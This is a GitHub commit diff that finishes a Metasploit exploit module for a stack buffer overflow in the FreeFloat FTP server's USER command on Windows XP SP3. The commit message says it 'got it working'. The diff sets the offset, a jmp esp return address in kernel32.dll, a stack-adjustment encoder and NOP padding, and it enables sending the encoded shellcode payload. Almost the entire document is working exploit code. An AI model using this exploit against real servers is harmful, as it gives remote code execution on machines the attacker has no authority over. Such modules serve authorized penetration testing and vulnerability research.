Skip to content

Commit 6e6b98e

Browse files
committed
got freefloatftp_user.rb working
1 parent d33d685 commit 6e6b98e

File tree

1 file changed

+7
-13
lines changed

1 file changed

+7
-13
lines changed

modules/exploits/windows/ftp/freefloatftp_user.rb

Lines changed: 7 additions & 13 deletions
Original file line numberDiff line numberDiff line change
@@ -33,28 +33,22 @@ def initialize(info = {})
3333
'Privileged' => false,
3434
'Payload' =>
3535
{
36-
'Space' => 500,
36+
'Space' => 440,
3737
'DisableNops' => true,
3838
'BadChars' => "\x00\x0a\x0d",
39-
#'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
40-
'StackAdjustment' => -3500
39+
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
4140
},
42-
'Targets' =>
41+
'Targets' =>
4342
[
4443
[ 'Windows XP SP3',
4544
{
46-
'Ret' => 0x7cb41020, # jmp esp
47-
#'Ret' => 0xDEADBEEF,
45+
'Ret' => 0x7c83c2c5, # jmp esp kernel32.dll
4846
'Offset' => 230
4947
}
5048
],
5149
],
5250
'DefaultTarget' => 0,
5351
'DisclosureDate' => 'Jun 12 2012'))
54-
register_options(
55-
[
56-
#OptAddress.new('SOURCEIP', [false, 'The local client address'])
57-
], self.class)
5852
end
5953

6054
def check
@@ -71,9 +65,9 @@ def exploit
7165
connect
7266
buf = rand_text(target['Offset'])
7367
buf << [ target['Ret'] ].pack('V')
74-
#buf << payload.encoded
75-
raw_send("USER #{buf}\r\n")
76-
#send_user(buf)
68+
buf << make_nops(12)
69+
buf << payload.encoded
70+
send_user(buf)
7771
disconnect
7872
end
7973

0 commit comments

Comments
 (0)